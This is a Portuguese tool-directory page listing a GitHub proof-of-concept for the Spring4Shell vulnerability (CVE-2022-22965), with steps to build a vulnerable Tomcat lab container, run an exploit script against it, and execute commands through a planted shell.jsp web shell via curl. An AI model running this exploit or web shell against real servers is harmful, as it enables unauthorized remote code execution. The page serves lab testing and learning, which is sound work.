Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-22965-Spring4Shell — PoC e exploit para CVE-2022-22965 Spring4Shell | Kitploit
Ferramentas/GitHubGitHub/jakabakos/cve-2022-22965-spring4shell
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubjakabakos/cve-2022-22965-spring4shell

CVE-2022-22965-Spring4Shell

PoC e exploit para CVE-2022-22965 Spring4Shell

Ver Repositório
221há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Spring4Shell

Spring4Shell (CVE-2022-22965) Prova de Conceito com um servidor Tomcat vulnerável e uma aplicação spring4shell vulnerável.

Detalhes sobre esta vulnerabilidade

  • https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
  • https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
  • https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

Como usar

Construir a imagem

root@kitploit:~
docker build . -t spring4shell

Executar o container

root@kitploit:~
docker run -p 80:8080 spring4shell

Você também pode executá-lo com a porta do depurador exposta, se necessário:

root@kitploit:~
docker run -p 80:8080 –p 5005:5005 spring4shell

Consulte a publicação original do blog para obter detalhes sobre como configurar um depurador remoto no IntelliJ Idea!

Executar o exploit

root@kitploit:~
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell

Depois, você pode executar qualquer comando remotamente assim:

root@kitploit:~
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -

...ou visitando a URL acima.

Baixar ferramenta